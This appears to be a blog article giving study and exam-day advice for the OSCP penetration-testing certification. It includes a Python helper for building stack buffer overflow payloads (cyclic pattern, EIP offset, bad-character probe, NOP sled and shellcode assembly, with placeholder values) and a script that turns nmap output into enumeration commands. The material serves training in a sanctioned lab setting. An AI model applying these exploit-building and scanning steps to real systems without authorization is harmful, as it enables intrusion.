Preparing for and taking the OSCP
The OSCP certification is a near-mythical rite of passage for many within the cybersecurity field, one of the few certifications that requires you to actually hack several machines and demonstrate real practical skills. This ain’t no multiple-choice test. However, it does not have to be as daunting as many make it seem. If you know from the outset what to prepare for and what not to, you can tackle it on your first attempt. And if you do not pass the first time, don’t worry: many people take it several times, and a retake is relatively inexpensive.
When you sign up for the course/exam, you can purchase 30, 60, or 90 days of lab time. Your decision will depend on several factors, including how prepared you already feel going in. Your purchase includes lab time, a lengthy PDF manual, video lessons, and one exam attempt. The course is Penetration Testing with Kali Linux (PWK) by Offensive Security, and it culminates in the OSCP certification exam. The exam itself is 24 hours straight, and there are 5 machines for you to hack on the exam.
Preparing for the exam
The best way to prepare for the OSCP is by popping boxes on VulnHub and HackTheBox. You can find write-ups and walkthroughs that show you how to pwn them; my favorites are YouTube walkthroughs. You will need to wean yourself off these as you get closer to the exam, since no one will be walking you through the exam machines. Many people report that these boxes helped them more than the actual PWK labs, stating that the PWK lab machines are quite different from the exam machines.
You will certainly want to know your way around Kali Linux and all its major tools. Be comfortable and quick at the Linux command line before taking the test. You should also have some coding and scripting experience, enough to read existing exploit code and edit it (target address, port, offsets, payload) to make it work in a given scenario.
For the sake of efficiency, you do not need to study or practice Active Directory, pivoting, or social engineering for the OSCP; these technologies and tactics are not tested on the actual exam. Exam scope does change over time, though, so confirm what is in and out against the current official OSCP exam guide before deciding what to skip. One thing you do need to study is buffer overflows, because one of the machines on the test requires a buffer overflow exploit. Practice the full workflow (fuzzing the input, finding the EIP offset, identifying bad characters, locating a return address, and delivering shellcode) until you feel comfortable with it.
Most of the boxes on the exam are well patched, so expect to be using the less obvious exploits, misconfigurations, and application vulnerabilities. Do not count on kernel exploits on the exam: they are rarely the intended path, and a failed one can crash the target and cost you a machine. Learn both Windows and Linux privilege escalation techniques.
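The buffer overflow workflow above is mechanical enough to script. The following helpers are an added example written for this article, not code from the PWK course or from any exploit: they generate the classic non-repeating "Aa0Aa1..." pattern, turn the EIP value read from the debugger back into an offset, build the bad-character probe that is compared against a memory dump, and assemble the final payload. The return address `0x5f4a358f` and the four-byte `\xcc` "shellcode" used in the usage call are placeholders, not real values from any target.

```python
"""Stack buffer overflow prep helpers: cyclic pattern, offset lookup,
bad-character probe, and payload assembly (added example, x86 / 32-bit)."""
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Generate the Metasploit-style pattern 'Aa0Aa1Aa2...' truncated to length.
    Every 4-byte window is unique for the first 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(eip_value: int, length: int = 20280) -> int:
    """Map the EIP value shown in the debugger (e.g. 0x39694438) back to the
    byte offset in the pattern that overwrote it. x86 is little-endian, so the
    register value 0x39694438 corresponds to the bytes b'8Di9' in memory."""
    needle = struct.pack("<I", eip_value)
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern; was EIP really overwritten by it?")
    return idx


def badchar_probe(exclude=(0x00,)) -> bytes:
    """Every byte value except those already known to be bad. Send this after
    the junk/offset bytes and compare the stack dump: the first byte that is
    missing or mangled is the next bad character to add to exclude."""
    return bytes(b for b in range(0x100) if b not in exclude)


def build_exploit(offset: int, ret_addr: int, shellcode: bytes,
                  nop_len: int = 16, total: int = None) -> bytes:
    """Assemble: junk up to EIP, return address (packed little-endian),
    NOP sled, shellcode, then optional padding to keep the request size fixed."""
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode
    if total is not None and len(payload) < total:
        payload += b"C" * (total - len(payload))
    return payload


if __name__ == "__main__":
    # EIP 0x39694438 is the classic value seen after a 2606-byte overflow.
    offset = find_offset(0x39694438)
    print("EIP offset:", offset)
    # 0x5f4a358f is a hypothetical JMP ESP address; \xcc*4 stands in for shellcode.
    payload = build_exploit(offset, 0x5f4a358f, b"\xcc" * 4)
    print("payload length:", len(payload))
```

A bad-character list always starts with `\x00`; re-run the probe each time you add a byte, because a single bad character corrupts every byte after it and hides the others.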
You should be familiar with your methodology by the time you go into the exam. Know your process, the general steps you are going to take, and the main tools you are going to use.
Lastly, do lots of research! This article is meant to be a brief overview, but you will want to do plenty of research on your own while preparing for the OSCP.
You will need to document everything you do during the exam, because you must write a report detailing all the steps you took to earn a passing score. So, take screenshots of every step, including the command you ran and the proof you collected. Many people use CherryTree or other applications for documentation. I prefer OneNote and Google Docs since they are automatically synced to the cloud. Some recommend recording your exam with a program like OBS, but that is up to you.
The common consensus is that the crux of the OSCP is “enumeration, enumeration, enumeration.”
Scan the network and enumerate everything about each host: open ports, running services and their version numbers, and, once you have a shell, users and processes. Run gobuster or dirbuster against any web service you find, and look up every version string you collect.
Most people recommend starting with the buffer overflow machine, then proceeding to the lowest-hanging fruit, and working your way up. Save Metasploit for the very end. Metasploit is only usable against one machine during the test, so only use it when you are really stuck. However, you can use msfvenom and searchsploit as much as you want.
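The enumeration loop above (scan, pull out services and versions, then fan out into web brute-forcing and exploit lookups) is worth automating so that nothing gets skipped under exam pressure. The script below is an added example, not part of this article or of any Offensive Security material: it parses nmap's grepable (`-oG`) output and emits the follow-up commands a practitioner would queue next. The scan text is constructed sample data, the hosts `10.11.1.5` and `10.11.1.9` are made up, and the wordlist path is an assumed Kali default.

```python
"""Parse nmap -oG output and generate follow-up enumeration commands
(added example with constructed sample data)."""
import shlex
from dataclasses import dataclass


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str


# Constructed sample of grepable nmap output; not a real scan. Real -oG output
# separates the Ports field from "Ignored State" with a tab, as here.
SAMPLE_GNMAP = """# Nmap 7.80 scan initiated as: nmap -sV -oG scan.gnmap 10.11.1.0/24
Host: 10.11.1.5 ()\tStatus: Up
Host: 10.11.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)
Host: 10.11.1.9 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)/, 8443/open/tcp//ssl|http//Apache Tomcat (Coyote JSP engine 1.1)/\tIgnored State: closed (998)
# Nmap done
"""


def parse_gnmap(text: str) -> list:
    """Each port entry is port/state/proto/owner/service/rpcinfo/version/."""
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            f = entry.split("/")
            if len(f) < 7:
                continue  # malformed entry; skip rather than guess
            services.append(Service(host, int(f[0]), f[2], f[1], f[4], f[6].strip()))
    return services


def web_targets(services: list) -> list:
    """URLs for anything that looks like HTTP; TLS if nmap saw ssl or the port implies it."""
    urls = []
    for s in services:
        if s.state != "open":
            continue
        if "http" not in s.name and s.port not in (80, 443, 8080, 8443):
            continue
        https = "ssl" in s.name or "https" in s.name or s.port in (443, 8443)
        scheme = "https" if https else "http"
        default_port = (scheme == "http" and s.port == 80) or (scheme == "https" and s.port == 443)
        urls.append(f"{scheme}://{s.host}" + ("" if default_port else f":{s.port}"))
    return urls


def version_keyword(version: str) -> str:
    """Trim nmap's parenthetical extras so the search term stays specific but short."""
    return version.split("(")[0].strip()


def followup_commands(services: list, wordlist="/usr/share/wordlists/dirb/common.txt") -> list:
    cmds = []

    def add(cmd):
        if cmd not in cmds:
            cmds.append(cmd)

    for host in sorted({s.host for s in services}):
        # A default scan only covers the top 1000 ports; always follow up with all 65535.
        add(f"nmap -p- -T4 -oN {host}-allports.txt {host}")
    for url in web_targets(services):
        tag = url.split("//", 1)[1].replace(":", "_")
        add(f"gobuster dir -u {url} -w {wordlist} -o gobuster-{tag}.txt")
    for s in services:
        if s.state != "open":
            continue
        if s.name in ("microsoft-ds", "netbios-ssn"):
            add(f"enum4linux -a {s.host}")
        if s.version:
            add(f"searchsploit {shlex.quote(version_keyword(s.version))}")
    return cmds


if __name__ == "__main__":
    for cmd in followup_commands(parse_gnmap(SAMPLE_GNMAP)):
        print(cmd)
```

The generated commands are printed rather than executed so you can review them, then paste them into a second terminal and let them run in the background while you work on the first host by hand.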
Multitask. You should always have something running in the background while you work on something in the foreground. Don’t sit and wait for scans to finish; let them run while you enumerate another host by hand.
There is most likely an existing exploit out there that will work for you with a little tweaking. You can find exploits on sites such as exploit-db.com, packetstormsecurity.com, and several others; read the code before you run it so you know what it changes on the target. It is important to keep a cool head while taking the exam. Many have reported psyching themselves out and letting their nerves get the best of them. Take breaks, go outside, drink tea, whatever you need to do to clear your head from time to time. 24 hours is enough time to pass.
Professor William Colachicco
Orlando, FL in the US